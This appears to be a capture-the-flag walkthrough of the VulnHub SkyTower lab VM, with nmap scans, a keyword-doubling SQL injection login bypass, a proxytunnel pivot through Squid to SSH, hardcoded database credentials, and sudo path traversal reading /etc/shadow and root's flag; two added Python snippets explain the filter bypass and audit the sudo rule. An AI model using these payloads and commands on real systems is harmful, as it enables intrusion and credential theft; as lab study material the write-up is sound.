Skytower

Published: 2023-10-11 11:19:27 Author: 吴语

Target: 192.168.1.144
Kali: 192.168.1.128
On VulnHub this target ships as a .vbox file: import it into VirtualBox, export it as an .ova, and import that into VMware. After the import succeeds, check the network settings.
Information gathering: scan with nmap first

sudo nmap --min-rate 10000 -p- 192.168.1.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 14:13 CST
Nmap scan report for bogon (192.168.1.144)
Host is up (0.00067s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
3128/tcp open     squid-http

sudo nmap -sT -sV -O -p22,80,3128 192.168.1.144
[sudo] wyh 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 14:13 CST
Nmap scan report for bogon (192.168.1.144)
Host is up (0.00040s latency).

PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
3128/tcp open     http-proxy Squid http proxy 3.1.20
MAC Address: 00:0C:29:F3:01:01 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop

sudo nmap -sU -p22,80,3128 192.168.1.144    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 14:14 CST
Nmap scan report for bogon (192.168.1.144)
Host is up (0.00034s latency).

PORT     STATE  SERVICE
22/udp   closed ssh
80/udp   closed http
3128/udp closed ndl-aas

Port 3128 runs the Squid 3.1.20 web proxy, which may have old-version vulnerabilities.
The web side is a login page, which may also have web vulnerabilities. Testing showed a SQL injection with verbose error messages.
Forwarding the request from Burp to sqlmap yielded no data, so there must be some filtering; tried testing by hand.
Found that simple keyword doubling bypasses it:
email=admin'oorr 1>0 #&password=123
The response contains the account's password. Tried SSH but could not log in; a proxy hop is probably needed.
proxytunnel can be used for the hop:
proxytunnel -a 6666 -p 192.168.1.144:3128 -d 192.168.1.144:22
This listens on local port 6666; when a connection arrives on local port 6666, proxytunnel forwards it through the proxy at 192.168.1.144:3128, which finally relays it to port 22 on the remote target 192.168.1.144.
This gives an SSH connection to the remote server through a proxy tunnel.
proxytunnel is a local port forwarder, mainly used to forward a single TCP port.
Then connect with SSH:
ssh john@127.0.0.1 -p 6666
The connection succeeded but exited immediately. After searching Baidu, it turned out that even though it auto-exits, commands can still be run at login time.
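As an added example (not code from the original post), here is the mechanism behind the oorr bypass seen from the defender's side: a single-pass keyword strip reassembles the doubled keyword, a fixed-point filter and a post-filter recheck catch it, and a parameterised query (the real fix) makes the filter unnecessary. The page does not show login.php's filter, so the single-pass strip is an assumption, and the in-memory table is constructed from the credentials dumped later on the page.

```python
import re
import sqlite3

# Keywords a naive login filter strips in a single pass (assumption: the page
# does not show login.php's filter; this reconstructs the single-pass strip
# that the double-written "oorr" payload reassembles into "or").
BLOCKED = ("or", "and", "union", "select")

def naive_filter(value: str) -> str:
    """Single pass: remove each blocked keyword, case-insensitively."""
    for kw in BLOCKED:
        value = re.sub(kw, "", value, flags=re.IGNORECASE)
    return value

def filter_until_stable(value: str) -> str:
    """Re-apply the filter until nothing changes, so a doubled keyword cannot survive."""
    while True:
        stripped = naive_filter(value)
        if stripped == value:
            return stripped
        value = stripped

def still_contains_keyword(value: str) -> bool:
    """Detection check: input that still carries a keyword after one pass is a
    doubling attempt (note: this also fires on words like 'world' or 'band')."""
    filtered = naive_filter(value).lower()
    return any(kw in filtered for kw in BLOCKED)

def make_db() -> sqlite3.Connection:
    """Constructed in-memory login table holding the credentials the walkthrough dumps."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (email TEXT, password TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?)", [
        ("john@skytech.com", "hereisjohn"),
        ("sara@skytech.com", "ihatethisjob"),
        ("william@skytech.com", "senseable"),
    ])
    return conn

def login_safe(conn: sqlite3.Connection, email: str, password: str) -> list:
    """The real fix: a parameterised query treats the input as data, never as SQL,
    so neither the keyword filter nor its doubling bypass matters."""
    cur = conn.execute(
        "SELECT email FROM login WHERE email = ? AND password = ?", (email, password))
    return [row[0] for row in cur.fetchall()]
```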

ssh john@127.0.0.1 -p 6666 id
john@127.0.0.1's password: 
uid=1000(john) gid=1000(john) groups=1000(john)

ssh john@127.0.0.1 -p 6666 /bin/bash
john@127.0.0.1's password: 
id
uid=1000(john) gid=1000(john) groups=1000(john)

That gives a non-interactive shell. How to switch to an interactive one, or change the SSH-related settings so it does not auto-exit?

bash loads the contents of .bashrc on every start. Every user's home directory has this shell script; it stores and loads your terminal configuration and environment variables.
cat .bashrc
The last line turns out to be an exit command; delete it:
sed -i '$d' .bashrc
Reconnect with SSH; login succeeds.

ssh john@127.0.0.1 -p 6666          
john@127.0.0.1's password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct  8 11:09:55 2023 from 192.168.1.144

Funds have been withdrawn
john@SkyTower:~$ 

Checked the kernel with msf and found nothing usable, so tried escalating via the database: went into the www directory looking for config files and related information.
In login.php found:

john@SkyTower:/var/www$ cat login.php
<?php
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');

Log in with root / root
-h specifies the host, -u the user, -p means a password is required

john@SkyTower:/var/www$ mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 17793
Server version: 5.5.35-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

Look at the information in the database:

john@skytech.com    | hereisjohn   |
sara@skytech.com    | ihatethisjob |
william@skytech.com | senseable    |

Found three accounts' passwords. Logged into the web page with each, and found the SSH passwords are the same as the web passwords.

ssh sara@127.0.0.1 -p 6666 /bin/bash
sara@127.0.0.1's password: 
id
uid=1001(sara) gid=1001(sara) groups=1001(sara)

Repeat the earlier steps: delete the exit command on the last line of .bashrc
sed -i '$d' .bashrc
Reconnect with SSH

ssh sara@127.0.0.1 -p 6666          
sara@127.0.0.1's password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 11 06:05:12 2023 from 192.168.1.144

Funds have been withdrawn
sara@SkyTower:~$ sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

So root commands can be run on files under the accounts directory.
sara@SkyTower:~$ sudo cat /accounts/../etc/shadow
Read shadow directly: the hashes are salted SHA-512 and john apparently could not crack them. Searched around for files and finally found the root password in flag.txt under the root directory.

sara@SkyTower:~$ sudo cat /accounts/../../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
sara@SkyTower:~$ su root
Password: 
root@SkyTower:/home/sara# id
uid=0(root) gid=0(root) groups=0(root)
root@SkyTower:/home/sara#
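As an added example (not code from the original post), an audit check for the sudoers rule above: it parses the `sudo -l` line copied from the page, shows why `/accounts/*` also matches `/accounts/../etc/shadow` (the `*` spans `/`; Python's fnmatch stands in here for sudo's own matcher, as the walkthrough demonstrates), and flags any argument that normalises to a path outside the intended directory. The rule-line regex and the directory check are assumptions of this example, not sudo's code.

```python
import fnmatch
import os
import re

# The "may run" line printed by `sudo -l` on the box (copied from the page).
SUDO_L_LINE = "(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*"

# Assumed layout of one rule: "(runas) [NOPASSWD:] command args", comma-separated.
RULE_RE = re.compile(
    r"\((?P<runas>[^)]+)\)\s*(?:NOPASSWD:\s*)?(?P<cmd>\S+)\s*(?P<args>[^,]*)")

def parse_rules(line: str) -> list:
    """Split a `sudo -l` line into (runas, command, argument-pattern) tuples."""
    return [(m.group("runas"), m.group("cmd"), m.group("args").strip())
            for m in RULE_RE.finditer(line)]

def sudo_arg_matches(pattern: str, arg: str) -> bool:
    """Glob match as sudo applies it to arguments: '*' also matches '/' and '..'."""
    return fnmatch.fnmatchcase(arg, pattern)

def escapes_directory(pattern: str, arg: str) -> bool:
    """True when arg satisfies the glob but its normalised path leaves the
    directory the rule author intended (the prefix before the first '*')."""
    if not sudo_arg_matches(pattern, arg):
        return False
    base = os.path.normpath(pattern.split("*", 1)[0])   # e.g. '/accounts'
    target = os.path.normpath(arg)                       # collapses '..' segments
    return os.path.commonpath([base, target]) != base

def risky_rules(line: str) -> list:
    """Flag rules whose argument glob is an absolute path containing '*':
    such rules allow traversal unless the binary itself rejects '..' paths."""
    return [(cmd, args) for _, cmd, args in parse_rules(line)
            if args.startswith("/") and "*" in args]
```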